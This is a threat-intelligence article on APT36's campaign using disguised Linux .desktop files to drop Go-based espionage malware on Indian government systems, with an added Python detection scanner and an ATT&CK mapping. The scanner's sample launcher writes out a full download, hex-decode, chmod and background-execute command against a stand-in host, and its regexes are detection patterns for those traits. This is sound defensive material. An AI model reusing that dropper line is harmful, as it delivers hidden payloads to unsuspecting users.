APT36, also known as Transparent Tribe, has launched a new wave of cyberattacks against Indian government and defense entities by exploiting Linux .desktop files as malware droppers. According to reports from CYFIRMA and CloudSEK, the campaign began on August 1, 2025, and remains active. The threat group, believed to operate from Pakistan, is using phishing lures to trick victims into executing malicious files disguised as PDFs, enabling espionage operations and long-term data theft.
APT36 has a history of cyber-espionage in South Asia, but this campaign reflects an evolution in its tradecraft. Instead of relying solely on Windows-based lures, the group is expanding to Linux environments, taking advantage of under-monitored desktop file mechanisms to bypass detection.
How the Attack Chain Begins with Malicious ZIP Archives
The infection vector starts with phishing emails delivering ZIP files to targeted users. Inside these archives, attackers include a malicious .desktop file masquerading as a PDF document. Victims, assuming they are opening a harmless report, trigger the attack chain when they click the file.
Linux .desktop files are normally harmless text-based launchers that define application names, icons, and commands for desktop environments. However, in this campaign, APT36 modifies them to execute bash commands instead of launching genuine applications.
When executed, the file instructs the system to:
- Create a temporary filename under /tmp/.
- Download a hex-encoded payload from attacker-controlled infrastructure or Google Drive.
- Decode and save it locally.
- Use chmod +x to make the payload executable.
- Launch it silently in the background.
To reduce suspicion, the script also opens a decoy PDF hosted on Google Drive in Firefox, ensuring the victim sees expected content while the malware executes in the background.
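The chain above gives defenders a concrete set of indicators to look for inside a launcher's Exec= line. The following scanner is an added example, not code from CYFIRMA, CloudSEK or the campaign itself: it parses a .desktop file and flags the traits the article describes (document-style Name on an Application entry, a shell wrapper, /tmp staging, a download, hex decoding, chmod +x, backgrounding, a browser decoy). The sample launchers, the attacker.invalid host and the threshold are constructed for illustration.

```python
import re

# Constructed sample that reproduces the traits described in the article.
# The host is a placeholder, not a real indicator from the campaign.
SUSPICIOUS_DESKTOP = """[Desktop Entry]
Type=Application
Name=Defence_Report_2025.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "f=/tmp/.x$$; curl -s https://attacker.invalid/p.hex -o $f.hex; xxd -r -p $f.hex > $f; chmod +x $f; nohup $f >/dev/null 2>&1 & firefox https://drive.google.com/file/d/PLACEHOLDER/view"
"""

# Constructed benign launcher for comparison.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=org.gnome.TextEditor
Terminal=false
"""

# (label, regex over the Exec= value); each rule maps to one step of the chain.
EXEC_RULES = [
    ("shell interpreter wrapper", r"\b(ba)?sh\s+-c\b"),
    ("writes under /tmp", r"/tmp/"),
    ("downloads remote content", r"\b(curl|wget)\b|drive\.google\.com"),
    ("hex decoding", r"\bxxd\s+-r\b"),
    ("marks payload executable", r"\bchmod\s+\+x\b"),
    ("backgrounded execution", r"\bnohup\b|(?<![&>])&(?!&)"),  # single '&', not '&&' or '2>&1'
    ("opens browser decoy", r"\b(firefox|xdg-open)\b"),
]
THRESHOLD = 3  # assumed: a launcher with three or more traits is worth an alert

def parse_desktop(text):
    """Return the key/value pairs of the [Desktop Entry] group (keys are case-sensitive)."""
    entry, in_entry = {}, False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_entry = line == "[Desktop Entry]"
        elif in_entry and "=" in line and not line.startswith("#"):
            key, value = line.split("=", 1)
            entry[key.strip()] = value.strip()
    return entry

def scan_desktop(text):
    """List the suspicious traits found in one .desktop file, in rule order."""
    entry = parse_desktop(text)
    findings = []
    if entry.get("Type") == "Application" and re.search(r"\.(pdf|docx?|xlsx?)$", entry.get("Name", ""), re.I):
        findings.append("document-like name on an Application launcher")
    exec_cmd = entry.get("Exec", "")
    findings += [label for label, pattern in EXEC_RULES if re.search(pattern, exec_cmd)]
    return findings

def is_suspicious(text):
    return len(scan_desktop(text)) >= THRESHOLD
```

Run it over ~/Desktop, ~/.local/share/applications and any extracted mail attachments; the individual traits are common in legitimate launchers, so alert on the combination rather than on a single match.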
Why Linux .desktop Files Are an Attractive Target
Linux desktop files have not traditionally been considered a security risk. They are plain text files, not binaries, and therefore are not closely scrutinized by most endpoint security tools. APT36’s exploitation of this feature mirrors how Windows LNK shortcut files have long been weaponized by attackers to deliver payloads while appearing benign.
The abuse of .desktop files makes detection and prevention difficult. Because the files themselves are not inherently malicious, traditional antivirus solutions may fail to flag them. This provides APT36 with a stealthy way to distribute malware in environments that are increasingly adopting Linux systems in enterprise and defense networks.
Payload Analysis: Go-Based ELF Malware
The dropped payload is a Go-based ELF executable designed for espionage. Researchers note that the malware is packed and obfuscated, making static analysis challenging. Despite these hurdles, investigation revealed several key functions:
- Data Exfiltration: The malware establishes a secure channel to send sensitive files and credentials back to attacker infrastructure.
- Remote Command Execution: Operators can issue arbitrary commands on the compromised host, enabling full system control.
- Persistence Mechanisms: The malware may configure cron jobs or systemd services to ensure it remains active even after reboots.
- Stealth Mode: The binary can run in hidden mode to avoid detection by system administrators.
Communication between infected systems and the command-and-control (C2) server takes place through a bi-directional WebSocket channel. This enables low-latency interactions, such as live command execution and immediate exfiltration of stolen data.
Campaign Evolution Reflects APT36’s Growing Sophistication
While APT36 has historically focused on Windows malware, this campaign shows a strategic expansion into Linux ecosystems. The group’s ability to adapt its techniques across platforms highlights its persistence and resource investment. CYFIRMA and CloudSEK both emphasize that the tactics, techniques, and procedures (TTPs) align with past Transparent Tribe operations, including reliance on phishing lures and staged payload delivery.
However, the use of Linux .desktop files is notable for its rarity. Few advanced persistent threat (APT) groups have attempted to weaponize Linux launchers in this manner. This not only demonstrates innovation but also raises challenges for defenders, as many Linux security frameworks may not yet treat desktop files as risky attack vectors.
Broader Context of South Asian Cyber-Espionage
APT36 is one of several Pakistan-linked groups conducting cyber-espionage against Indian defense, diplomatic, and government targets. Past operations involved Windows malware families, mobile spyware, and credential phishing campaigns. This new Linux-focused approach suggests an attempt to broaden operational reach to environments where Windows dominance is lower, particularly within defense research and command networks.
The campaign also mirrors a wider industry trend: state-aligned actors are increasingly targeting Linux servers and workstations because of their widespread role in enterprise and cloud infrastructure. By adopting novel delivery mechanisms, groups like APT36 seek to ensure long-term access and reduce the chance of exposure.
A Sign of Escalating Threat to Linux Environments
This latest campaign demonstrates that Linux platforms are not immune from the same level of creative exploitation seen in Windows ecosystems. By turning an everyday feature like .desktop files into a weapon, APT36 has expanded its arsenal while lowering the chances of early detection.
Both CYFIRMA and CloudSEK warn that the campaign remains active and may evolve further. For enterprises and government organizations in the region, the findings serve as a reminder that Linux workstations, often overlooked in security strategies, are becoming high-value targets for espionage groups.
MITRE ATT&CK Mapping of APT36 Campaign
Tactic | Technique | ID | Description |
---|---|---|---|
Initial Access | Phishing: Spearphishing Attachment | T1566.001 | Malicious ZIP archives containing .desktop files are delivered via targeted phishing emails. |
Execution | Command and Scripting Interpreter: Bash | T1059.004 | The .desktop file executes bash commands to download and run the payload. |
Defense Evasion | Masquerading: Match Legitimate Name or Location | T1036.005 | Malicious files masquerade as PDFs to avoid suspicion. |
Persistence | Scheduled Task/Job: Cron | T1053.003 | The payload may use cron jobs or systemd services to survive reboots. |
Command and Control | Application Layer Protocol: WebSockets | T1071.001 | The malware establishes a bi-directional WebSocket channel for C2 communications. |
Exfiltration | Exfiltration Over C2 Channel | T1041 | Stolen files and credentials are transmitted over the established C2 channel. |
Execution | User Execution: Malicious File | T1204.002 | The attack requires the victim to manually execute the disguised .desktop file. |